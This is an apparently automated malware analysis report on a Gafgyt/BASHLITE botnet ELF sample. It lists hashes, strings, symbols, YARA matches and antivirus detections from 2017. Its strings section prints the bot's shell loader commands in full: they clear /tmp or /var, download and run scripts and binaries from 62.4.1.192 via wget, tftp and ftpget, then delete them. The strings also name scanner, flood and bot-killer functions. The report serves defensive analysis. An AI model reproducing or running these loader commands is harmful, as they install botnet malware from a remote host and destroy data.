Report #3475

Binary
ABI
ELFOSABI_SYSV
Size
115.10KB
Type
ET_EXEC
trid
50.1% ELF Executable and Linkable format
49.8% ELF Executable and Linkable format
type
ELF
Wordsize
32
Architecture
x86
Hashes
md5
1e3eb990093ab52d6bab2f4d2faa0899
sha1
e55e89156d3cb193c3db91b79578c3a3f6dd17f1
crc32
0x337fc677
sha224
60c64ebf4b6233b958b24b605ce2683d8e565a641ba38b8b0603774d
sha256
2a5c4b8a739b4c1c85f4866abb02a4699112d09d60ea41b1190127412029eb54
sha384
8c3d21578b2dc63b8b8a19570c5cb71115cf6e4a6b4ec75d0fc9b09cd101fd390686485211657ad18c3e4664677f21be
sha512
54017a83de9d6435b0f22917293c683df80b7942e49a6ec40cbab612f41dde73082f2cd2961eb09c58c20a8fb460d2a01a1ded9264ec6875af6d00caff330dd1
ssdeep
3072:rZPdcFxxsBkOxYvDn64tQBQlS4eIpmLZ0PYKSDDIQ:eAkOObnTqBCeIpmLZ0PYKSDDIQ
Community
Google
False
HashLib
False
YARA
Matches
maldoc_getEIP_method_1, domain, url, IP, contentis_base64, Gafgyt_Botnet_jackmy, is__elf

Suspicious
True

Dwarf
List

Number
0
Files
Sys

Home

Proc
/proc/net/route
Password

Suspicious
True
Flags
Flags
0
Packer
List
None
Packed
False
Network
IPs
62.4.1.192, cd /tmp; rm -fr *; wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; rm -fr *; busybox wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; busybox sh gtop.sh; busybox tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; busybox sh tftp1.sh; busybox tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; busybox sh tftp2.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; wget http://62.4.1.192/jackmyarmv4; chmod +x jackmyarmv4; ./jackmyarmv4; rm -fr jackmyarmv4; exit, cd /var/; rm -rf sshd; wget http://62.4.1.192/jackmymipsel || tftp -r jackmymipsel -g 62.4.1.192; chmod 777 jackmymipsel; ./jackmymipsel; rm -rf jackmymipsel, Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41
URLs
cd /tmp; rm -fr *; wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; rm -fr *; busybox wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; busybox sh gtop.sh; busybox tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; busybox sh tftp1.sh; busybox tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; busybox sh tftp2.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit, cd /tmp; wget http://62.4.1.192/jackmyarmv4; chmod +x jackmyarmv4; ./jackmyarmv4; rm -fr jackmyarmv4; exit, cd /var/; rm -rf sshd; wget http://62.4.1.192/jackmymipsel || tftp -r jackmymipsel -g 62.4.1.192; chmod 777 jackmymipsel; ./jackmymipsel; rm -rf jackmymipsel, AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex), AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs), AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k), AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan), AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr), AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication), AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout), AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23), AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver), AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k), magpie-crawler/1.1 (U; Linux amd64; en-GB; 
+http://www.brandwatch.net), Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+), MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+), MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+), Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
Mails

Suspicious
True
Strings
List
AppEngine-Google; (+http://code.google.com/appengine; appid: unblock4myspace)AppEngine-Google; (+http://code.google.com/appengine; appid: tunisproxy)
AppEngine-Google; (+http://code.google.com/appengine; appid: longbows-hideout)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: proxy-in-rs)
AppEngine-Google; ( http://code.google.com/appengine; appid: proxy-ba-k)
AppEngine-Google; (+http://code.google.com/appengine; appid: craigserver)
Mozilla/5.0 (compatible; MojeekBot/2.0; http://www.mojeek.com/bot.html)
Mozilla/5.0 (compatible; MJ12bot/v1.2.4; http://www.majestic12.co.uk/bot.php?+)
Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)
AppEngine-Google; (+http://code.google.com/appengine; appid: moelonepyaeshan)
AppEngine-Google; (+http://code.google.com/appengine; appid: mirrorrr)
AppEngine-Google; (+http://code.google.com/appengine; appid: eduas23)
AppEngine-Google; (+http://code.google.com/appengine; appid: webetrex)
magpie-crawler/1.1 (U; Linux amd64; en-GB; +http://www.brandwatch.net)
AppEngine-Google; (+http://code.google.com/appengine; appid: mapremiereapplication)
MJ12bot/v1.0.7 (http://majestic12.co.uk/bot.php?+)
MJ12bot/v1.0.8 (http://majestic12.co.uk/bot.php?+)
cd /tmp; rm -fr *; wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; sh gtop.sh; tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
cd /tmp; rm -fr *; busybox wget http://62.4.1.192/gtop.sh; chmod 777 gtop.sh; busybox sh gtop.sh; busybox tftp 62.4.1.192 -c get tftp1.sh; chmod 777 tftp1.sh; busybox sh tftp1.sh; busybox tftp -r tftp2.sh -g 62.4.1.192; chmod 777 tftp2.sh; busybox sh tftp2.sh; busybox ftpget -v -u anonymous -p anonymous -P 21 62.4.1.192 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf gtop.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; exit
cd /tmp; wget http://62.4.1.192/jackmyarmv4; chmod +x jackmyarmv4; ./jackmyarmv4; rm -fr jackmyarmv4; exit
cd /var/; rm -rf sshd; wget http://62.4.1.192/jackmymipsel || tftp -r jackmymipsel -g 62.4.1.192; chmod 777 jackmymipsel; ./jackmymipsel; rm -rf jackmymipsel
%s %s HTTP/1.1
/etc/config/resolv.conf
.got.plt
/etc/resolv.conf
Mozilla/5.0(iPad; U; CPU iPhone OS 3_2 like Mac OS X; en-us) AppleWebKit/531.21.10 (KHTML, like Gecko) Version/4.0.4 Mobile/7B314 Safari/531.21.10gin_lib.cc
User-Agent: %s
kill -9 %s
Network is down
Machine is not on the network
62.4.1.192
No route to host
Host is down
Mozilla/5.0 Galeon/1.2.9 (X11; Linux i686; U;) Gecko/20021213 Debian/1.2.9-0.bunk
Unknown host
been_there_done_that.2832
[TELNET] SCANNER OFF:%s
[PHONE] SCANNER OFF:%s
kill -9 $(pidof %s)
been_there_done_that
[PHONE] SCANNER ON:%s
[TELNET] SCANNER ON:%s
_fwrite.c
open.c
[31mPhone Cracked
write.c
contains_fail
Transport endpoint is not connected
No such process
Block device required
No such device or address
Remote address changed
Operation now in progress
Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5
Object is remote
Is a named type file
No such device
Too many open files in system
Too many open files
Too many links
Link has been severed
Connection reset by peer
.lib section in a.out corrupted
ICMPFlood
Cannot send after transport endpoint shutdown
ping %s -s %s -i %s -w %s
Operation not permitted
My IP: %s
NETIS SCANNER ON:%s
Connection: %s
8.8.8.8
Server_Botport
[37madmin
[36mUsername
[31mUsername
dnslookup.c
[31mPassword
[36mPassword
Too many users
__GI_execl
__dns_lookup
__GI_fflush_unlocked
PONG!
/etc/config/hosts
__libc_nanosleep
__GI_sleep
__open_nameservers
__nameserver
__socketcall
__GI_execve
__register_frame_info_bases
/etc/hosts
__GI_pipe
_Jv_RegisterClasses
get_telstate_host
__deregister_frame_info_bases
gethostbyname.c
socket_connect
gethostbyname_r
opennameservers.c

Symbols
List
libc/sysdeps/linux/i386/crti.S, crtstuff.c, __CTOR_LIST__, __DTOR_LIST__, __EH_FRAME_BEGIN__, __JCR_LIST__, completed.2429, p.2427, __do_global_dtors_aux, object.2482, frame_dummy, crtstuff.c, __CTOR_END__, __DTOR_END__, __FRAME_END__, __JCR_END__, __do_global_ctors_aux, initfini.c, libc/sysdeps/linux/i386/crtn.S, libc/sysdeps/linux/i386/crt1.S, premscus.c, C.3.4250, C.0.4233, C.8.4295, C.13.4392, c, Q, i.4446, printchar, prints, printi, print, fdopen_pids, hextable, get_random_ip, ipState, libc/sysdeps/linux/i386/vfork.S, __syscall_fcntl.c, __syscall_fcntl64.c, _exit.c, access.c, chdir.c, close.c, dup2.c, fork.c, getdtablesize.c, geteuid.c, getpid.c, getppid.c, getrlimit.c, ioctl.c, kill.c, open.c, pipe.c, prctl.c, read.c, select.c, setsid.c, sigprocmask.c, time.c, waitpid.c, write.c, isspace.c, toupper.c, __C_ctype_b.c, __C_ctype_toupper.c, __errno_location.c, puts.c, sprintf.c, vsnprintf.c, _stdio.c, _stdio_streams, __stdio_mutex_initializer.3991, _fixed_buffers, _wcommit.c, _vfprintf_internal.c, _charpad, _fp_out_narrow, spec_base.4201, prefix.4202, _ppfs_init.c, _ppfs_prepargs.c, _ppfs_setargs.c, _ppfs_parsespec.c, _promoted_size, type_codes, type_sizes, spec_flags.4203, qual_chars.4208, spec_chars.4204, spec_ranges.4205, spec_or_mask.4206, spec_and_mask.4207, fputc_unlocked.c, fputs_unlocked.c, fwrite_unlocked.c, memcpy.c, memset.c, strchr.c, strcpy.c, strlen.c, strncpy.c, strnlen.c, strstr.c, __glibc_strerror_r.c, __xpg_strerror_r.c, unknown.1161, _string_syserrmsgs.c, bcopy.c, strcasestr.c, strtok.c, next_start.1109, isatty.c, tcgetattr.c, ntohl.c, herror.c, error_msg, h_errlist, colon_space.2762, inet_ntoa.c, buf.2658, inet_makeaddr.c, gethostbyname.c, buf.4993, h.4992, gethostbyname_r.c, connect.c, getsockname.c, getsockopt.c, recv.c, send.c, sendto.c, setsockopt.c, socket.c, sigaddset.c, sigempty.c, signal.c, sigsetops.c, malloc.c, __malloc_largebin_index, free.c, __malloc_trim, abort.c, mylock, been_there_done_that, rand.c, random.c, mylock, 
unsafe_state, randtbl, random_r.c, random_poly_info, system.c, atol.c, strtol.c, _stdlib_strto_l.c, exit.c, execl.c, sleep.c, sysconf.c, __uClibc_main.c, __pthread_return_0, __pthread_return_void, __check_one_fd, been_there_done_that.2832, sigaction.c, __restore_rt, __restore, __syscall_error.c, libc/sysdeps/linux/i386/mmap.S, __socketcall.c, __syscall_rt_sigaction.c, clock_getres.c, execve.c, getegid.c, getgid.c, getpagesize.c, getuid.c, munmap.c, nanosleep.c, sbrk.c, wait4.c, __C_ctype_tolower.c, errno.c, __h_errno_location.c, wcrtomb.c, wcsrtombs.c, wcsnrtombs.c, fprintf.c, _WRITE.c, _fwrite.c, _trans2w.c, _load_inttype.c, _store_inttype.c, _uintmaxtostr.c, _fpmaxtostr.c, fmt, exp10_table, vfprintf.c, memchr.c, memmove.c, mempcpy.c, memrchr.c, strtok_r.c, strpbrk.c, inet_aton.c, dnslookup.c, mylock, static_ns, static_id, opennameservers.c, get_hosts_byname_r.c, raise.c, dl-support.c, brk.c, poll.c, fclose.c, fopen.c, fseeko.c, fseeko64.c, _adjust_pos.c, _fopen.c, _cs_funcs.c, fgets.c, fflush_unlocked.c, fgets_unlocked.c, strcmp.c, strncat.c, rawmemchr.c, strspn.c, strdup.c, ntop.c, inet_pton4, xdigits.3116, inet_ntop4, encodeh.c, decodeh.c, encodeq.c, lengthq.c, decodea.c, read_etc_hosts_r.c, llseek.c, tolower.c, fgetc_unlocked.c, strcasecmp.c, encoded.c, decoded.c, lengthd.c, _READ.c, _rfill.c, _trans2r.c, __fini_array_end, __fini_array_start, __init_array_end, __preinit_array_end, _GLOBAL_OFFSET_TABLE_, __init_array_start, __preinit_array_start, __read_etc_hosts_r, __GI_execve, __libc_sigaction, strcpy, __GI_fcntl64, recvLine, __GI_sigaddset, __socketcall, __GI___ctype_b, __GI_memchr, userID, __GI___glibc_strerror_r, waitpid, __open_nameservers, __GI_fopen, getrlimit, ioctl, _stdio_openlist_use_count, __GI_initstate_r, __GI_sigaction, strtok_r, __GI___C_ctype_toupper_data, __GI_time, getgid, sysconf, stdout, random, __GI_strdup, __GI_getpagesize, getdtablesize, __GI_h_errno, contains_fail, __length_question, __GI___ctype_toupper, __GI_strcasecmp, __GI_tolower, 
putc_unlocked, recv, connect, __encode_question, __GI___uClibc_fini, D3cOdeMePlS, numpids, __encode_header, __GI_strncat, sigemptyset, __pthread_mutex_lock, initConnection, __sigdelset, __GI_clock_getres, __uClibc_fini, memrchr, geteuid, inet_pton, __GI_vsnprintf, __GI_setsid, Phonepid, memmove, sendTCP, __bsd_signal, __GI_strpbrk, __stdio_trans2r_o, munmap, __GI_setsockopt, __libc_stack_end, __GI_fclose, __GI_wcsnrtombs, __GI_pipe, _uintmaxtostr, __libc_fcntl, atol, _h_errno, getRandomPublicIP, getc_unlocked, __ctype_b, __GI_random_r, usernames, sendUKNOWN, errno, getegid, read_until_response, __GI_sbrk, zprintf, NetisPid, __GI___uClibc_init, execve, getpagesize, getpid, __GI_lseek64, setstate_r, fgets, getHost, __libc_getpid, HackerScan1, wildString, __xpg_strerror_r, fcntl64, prctl, memcpy, makeRandomStr, __GI_fputs_unlocked, execl, NetisScanner, __GI_fgets, sendHTTP, creat, _stdio_openlist_dec_use, sclose, __libc_select, _ppfs_init, puts, __GI___C_ctype_toupper, __GI_fgetc_unlocked, __libc_nanosleep, trim, __GI_fgets_unlocked, dup2, __pthread_mutex_init, tolower, getuid, system, __open_etc_hosts, malloc, isatty, sleep, __GI_atol, vsnprintf, __dns_lookup, __GI_read, __C_ctype_tolower, phonepayload, random_r, __dso_handle, clock_getres, gethostbyname_r, tcpcsum, fdpclose, socket, __GI_dup2, select, _pthread_cleanup_pop_restore, __GI_wcrtomb, __GI___libc_fcntl, D1ckSuckaz, __GI_memset, isspace, __stdio_seek, mempcpy, __GI_strcoll, __GI_write, __ctype_toupper, __libc_read, _string_syserrmsgs, __GI_herror, __GI_open, __GI_strchr, __searchdomain, sigaddset, __GI_tcgetattr, __environ, mmap, wcsnrtombs, makeIPPacket, __GI_inet_ntoa, send, __fgetc_unlocked, abort, __GI_fcntl, __GI_wcsrtombs, __GI_fwrite_unlocked, __GI_getgid, srandom_r, _init, D1ckSucka, __GI_inet_ntoa_r, hostname_to_ip, __GI_setstate_r, parseHex, strtol, pipe, __libc_lseek64, strnlen, rawmemchr, __GI_mempcpy, __malloc_state, __GI___C_ctype_b_data, __sigaddset, nanosleep, __GI_send, h_errno, 
__pthread_mutex_unlock, wait4, __register_frame_info_bases, __GI_exit, __app_fini, csum, __exit_cleanup, __GI_execl, __GI_srandom_r, __GI___ctype_tolower, write, environ, __GI_close, getBuild, Server_Botport, fprintf, __resolv_lock, kill, fputs_unlocked, __pthread_mutex_trylock, TelnetPayload2, __GI_brk, __GI_nanosleep, __GI_strtok, _stdio_openlist, __GI_sigprocmask, inet_addr, ntohl, __GI_fseek, ourIP, chdir, fseeko, _stdio_openlist_del_count, connectTimeout, __raise, setsockopt, bsd_signal, fseek, __GI_kill, __GI_strcmp, CommandPayload, __GI_memmove, sendSTD, setstate, __decode_dotted, HackaShit, __stdio_READ, memchr, __GI_toupper, __pthread_initialize_minimal, __GI_recv, __stdin, stdin, __GI_isatty, strcasestr, _start, __deregister_frame_info_bases, strstr, __GI_ioctl, init_rand, rand, signal, read, __decode_header, __GI___h_errno_location, __GI_memcpy, strcoll, wcsrtombs, _stdio_user_locking, strncpy, strcasecmp, htonl, sendto, __C_ctype_toupper, __GI___C_ctype_b, __GI_gethostbyname_r, __GI_strncpy, TelnetPayload, __libc_send, PhoneScanner, __GI___xpg_strerror_r, __GI___C_ctype_tolower, __GI_getrlimit, bcopy, __GI_strcpy, __GI_inet_ntop, strtok, __GI___fputc_unlocked, __stdio_adjust_position, malloc_trim, __GI_poll, _vfprintf_internal, __GI_strcasestr, fork, __stdio_rfill, strncat, __GI_sleep, sigaction, __GI_gethostbyname, _dl_phdr, __GI_getc_unlocked, __GI___libc_fcntl64, __uClibc_init, __GI_munmap, _store_inttype, __length_dotted, __getpagesize, __GI_random, __syscall_error, __uclibc_progname, __GI_getegid, __GI_wait4, __malloc_lock, __uClibc_main, sbrk, __rtld_fini, __GI_fork, strdup, __libc_close, __GI_getpid, inet_aton, index, _pthread_cleanup_push_defer, processCmd, __sigismember, fopen, __bss_start, __libc_open, getOurIP, get_telstate_host, memset, __GI_socket, main, __glibc_strerror_r, listFork, __GI___C_ctype_tolower_data, __stdio_fwrite, negotiate, srand, initstate, fclose, __syscall_rt_sigaction, ntohs, sendUDP, inet_ntoa, getppid, tcgetattr, 
__C_ctype_tolower_data, time, __libc_system, __GI_abort, poll, fdpopen, __GI_fprintf, __get_hosts_byname_r, __stdio_init_mutex, __GI__exit, botkiller, herror, strcmp, advances2, __nameserver, data_start, HackerScan, __GI_sysconf, __h_errno_location, __GI_putc_unlocked, matchPrompt, __C_ctype_b_data, __GI_inet_pton, gethostbyname, _stdio_fopen, _fini, __GI_chdir, __vfork, __GI_mmap, sprintf, fdgets, __get_pc_thunk_bx, strerror_r, __GI_select, __libc_waitpid, socket_connect, __GI_waitpid, __GI_vfprintf, _stdio_term, __decode_answer, __GI_signal, stderr, fails, vfork, __C_ctype_b, srandom, ICMPFlood, _ppfs_setargs, __GI_sendto, __GI_sigemptyset, __libc_fork, LoginPayload, __atexit_lock, scanPid, rand_cmwc, findARandomIP, advances, __libc_fcntl64, getsockopt, __GI_fseeko64, hstrerror, fflush_unlocked, __stdio_wcommit, HackerPrint, contains_string, __GI___fgetc_unlocked, __nameservers, fwrite_unlocked, inet_ntoa_r, __pagesize, _stdio_openlist_add_lock, __GI_getdtablesize, access, _edata, __stdout, __GI_memrchr, __GI_fflush_unlocked, __GI_strstr, __searchdomains, _end, phone, htons, _sigintr, _ppfs_prepargs, __GI_strspn, fgetc_unlocked, initstate_r, PhoneScan, __GI_connect, __curbrk, __libc_poll, _dl_phnum, _fpmaxtostr, __errno_location, uppercase, _stdlib_strto_l, __GI___libc_open, exit, __stdio_WRITE, _stdio_init, __GI_geteuid, inet_ntop, brk, __C_ctype_toupper_data, _dl_aux_init, _errno, atoi, successes, _stdio_openlist_del_lock, __GI_inet_aton, fgets_unlocked, _exit, szprintf, strspn, __libc_recv, __libc_creat, strlen, lseek64, open, toupper, __libc_write, __malloc_consolidate, _ppfs_parsespec, __GI_strtol, __GI_getuid, __GI_strtok_r, __GI_errno, __libc_sendto, __stdio_trans2w_o, __GI_vfork, strchr, __GI_rawmemchr, __GI_raise, __data_start, setsid, __GI_inet_addr, __encode_dotted, __GI_strnlen, _Jv_RegisterClasses, macAddress, __GI___errno_location, fputc_unlocked, fcntl, read_with_timeout, __GI_atoi, fseeko64, __GI_sprintf, __ctype_tolower, wcrtomb, 
__GI_getsockname, close, __libc_connect, passwords, __GI_strlen, pids, sendCNC, vfprintf, strpbrk, _load_inttype, rangechoice, raise, useragents, free, sigprocmask, __fputc_unlocked, getsockname
Number
777
Reason
None
Suspicious
False
Version
Version
EV_CURRENT
Foremost
Matches
None
Suspicious
False
Sections
List
, .init, .text, .fini, .rodata, .eh_frame, .ctors, .dtors, .jcr, .got.plt, .data, .bss, .comment, .shstrtab, .symtab, .strtab
Number
16
Suspicious
False
Segments
Number
3
Suspicious
False
Compilers
List
GCC: (GNU) 4.1.2
Identified
170
Suspicious
True
Functions
List
Present
True
Anti-Debug
Ptrace
False
Anti-disasm
False
Entry Point
Address
0x8048164
Suspicious
False
Embedded ELF
List
None
Identified
0
Program Header
Size
32
Number
3
Offset
52
Section Header
Size
40
Number
16
Offset
95428
AVclass
gafgyt
1
VirusTotal
md5
1e3eb990093ab52d6bab2f4d2faa0899
sha1
e55e89156d3cb193c3db91b79578c3a3f6dd17f1
SCANS (DETECTION RATE = 38.98%)
AVG
result: ELF:DDoS-Y [Trj]
update: 20170807
version: 8.0.1489.320
detected: True

CMC
update: 20170805
version: 1.1.0.977
detected: False

MAX
update: 20170807
version: 2017.6.26.1
detected: False

Bkav
update: 20170807
version: 1.3.0.9282
detected: False

K7GW
update: 20170807
version: 10.20.24212
detected: False

ALYac
update: 20170807
version: 1.1.1.2
detected: False

Avast
result: ELF:DDoS-Y [Trj]
update: 20170807
version: 8.0.1489.320
detected: True

Avira
result: LINUX/Gafgyt.xdweo
update: 20170807
version: 8.3.3.4
detected: True

Baidu
update: 20170807
version: 1.0.0.2
detected: False

Cyren
update: 20170807
version: 5.4.30.7
detected: False

DrWeb
result: Linux.BackDoor.Fgt.373
update: 20170807
version: 7.0.28.2020
detected: True

GData
result: Linux.Trojan.Agent.EE1C4H
update: 20170807
version: A:25.13734B:25.10170
detected: True

Panda
update: 20170807
version: 4.6.4.2
detected: False

VBA32
update: 20170803
version: 3.12.26.4
detected: False

VIPRE
update: 20170807
version: 60118
detected: False

Zoner
update: 20170807
version: 1.0
detected: False

AVware
update: 20170807
version: 1.5.0.42
detected: False

ClamAV
result: Unix.Trojan.Mirai-5607483-0
update: 20170807
version: 0.99.2.0
detected: True

Comodo
update: 20170807
version: 27566
detected: False

F-Prot
update: 20170807
version: 4.7.1.166
detected: False

Ikarus
result: Trojan.Linux.Gafgyt
update: 20170807
version: 0.1.5.2
detected: True

McAfee
result: RDN/Generic BackDoor
update: 20170807
version: 6.0.6.653
detected: True

Rising
update: 20170807
version: 25.0.0.1
detected: False

Sophos
result: Linux/DDoS-BI
update: 20170807
version: 4.98.0
detected: True

Yandex
update: 20170801
version: 5.5.1.3
detected: False

Zillya
update: 20170806
version: 2.0.0.3355
detected: False

Arcabit
update: 20170807
version: 1.0.0.817
detected: False

Tencent
result: Linux.Backdoor.Gafgyt.Dzko
update: 20170807
version: 1.0.0.1
detected: True

ViRobot
update: 20170807
version: 2014.3.20.0
detected: False

Webroot
update: 20170807
version: 1.0.0.207
detected: False

Ad-Aware
update: 20170807
version: 3.0.3.1010
detected: False

AegisLab
result: Backdoor.Linux.Gafgyt!c
update: 20170807
version: 4.2
detected: True

Emsisoft
update: 20170807
version: 4.0.1.883
detected: False

F-Secure
update: 20170807
version: 11.0.19100.45
detected: False

Fortinet
update: 20170807
version: 5.4.247.0
detected: False

Jiangmin
result: Backdoor.Linux.rie
update: 20170807
version: 16.0.100
detected: True

Kingsoft
update: 20170807
version: 2013.8.14.323
detected: False

Symantec
result: Trojan.Gen.NPE
update: 20170807
version: 1.4.0.0
detected: True

nProtect
update: 20170807
version: 2017-08-07.02
detected: False

AhnLab-V3
update: 20170807
version: 3.9.2.18278
detected: False

Antiy-AVL
result: Trojan[Backdoor]/Linux.Gafgyt.aj
update: 20170807
version: 3.0.0.1
detected: True

Kaspersky
result: HEUR:Backdoor.Linux.Gafgyt.aj
update: 20170807
version: 15.0.1.13
detected: True

Microsoft
result: DDoS:Linux/Lightaidra!rfn
update: 20170807
version: 1.1.14003.0
detected: True

Qihoo-360
result: Win32/Trojan.DDoS.1be
update: 20170807
version: 1.0.0.1120
detected: True

TheHacker
update: 20170806
version: 6.8.0.5.1813
detected: False

ZoneAlarm
result: HEUR:Backdoor.Linux.Gafgyt.aj
update: 20170807
version: 1.0
detected: True

ESET-NOD32
result: a variant of Linux/Gafgyt.ADU
update: 20170807
version: 15873
detected: True

TrendMicro
result: Possible_BASHLITE.SMLBN1
update: 20170807
version: 9.862.0.1074
detected: True

WhiteArmor
update: 20170731
detected: False

BitDefender
update: 20170807
version: 7.2
detected: False

K7AntiVirus
update: 20170807
version: 10.20.24214
detected: False

Malwarebytes
update: 20170807
version: 2.1.1.1115
detected: False

TotalDefense
update: 20170807
version: 37.1.62.1
detected: False

CAT-QuickHeal
update: 20170807
version: 14.00
detected: False

NANO-Antivirus
result: Trojan.Unix.Fgt.eoklid
update: 20170807
version: 1.0.94.18103
detected: True

MicroWorld-eScan
update: 20170807
version: 12.0.250.0
detected: False

SUPERAntiSpyware
update: 20170807
version: 5.6.0.1032
detected: False

McAfee-GW-Edition
result: RDN/Generic BackDoor
update: 20170807
version: v2015
detected: True

TrendMicro-HouseCall
result: Possible_BASHLITE.SMLBN1
update: 20170807
version: 9.950.0.1006
detected: True

total
59
sha256
2a5c4b8a739b4c1c85f4866abb02a4699112d09d60ea41b1190127412029eb54
scan_id
2a5c4b8a739b4c1c85f4866abb02a4699112d09d60ea41b1190127412029eb54-1502107149
resource
1e3eb990093ab52d6bab2f4d2faa0899
positives
23
scan_date
2017-08-07 11:59:09
verbose_msg
Scan finished, information embedded
response_code
1
Binary
RF
confidence: 100.00%
suspicious: True
MLP
confidence: 99.98%
suspicious: True
SVM
confidence: 98.80%
suspicious: True